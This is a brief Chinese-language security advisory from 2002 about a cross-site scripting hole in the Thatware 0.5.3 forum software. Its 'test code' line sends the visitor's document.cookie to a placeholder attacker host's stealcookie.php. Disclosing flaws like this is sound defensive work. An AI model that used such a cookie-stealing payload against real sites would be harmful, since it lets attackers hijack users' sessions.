Thatware存在跨站脚本可执行漏洞发布时间:2002-02-28 更新时间:2002-02-28 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4175 受影响系统 Thatware Thatware 0.5.3详细描述 Thatware 是一款BBS系统类似Slashcode论坛系统。 其中远程用户可以通过构建插入脚本命令的URL到显示的页面,如果用户使用此 连接,就可以导致用户的COOKIE信息等被泄露。 测试代码 http://hax0 r/stealcookie.php%3Fcookie='+document.cookie' 解决方案 尚无 相关信息 参考:http://www.hackinthebox.org/article.php?sid=5494 相关主页:http://thatware.org/ |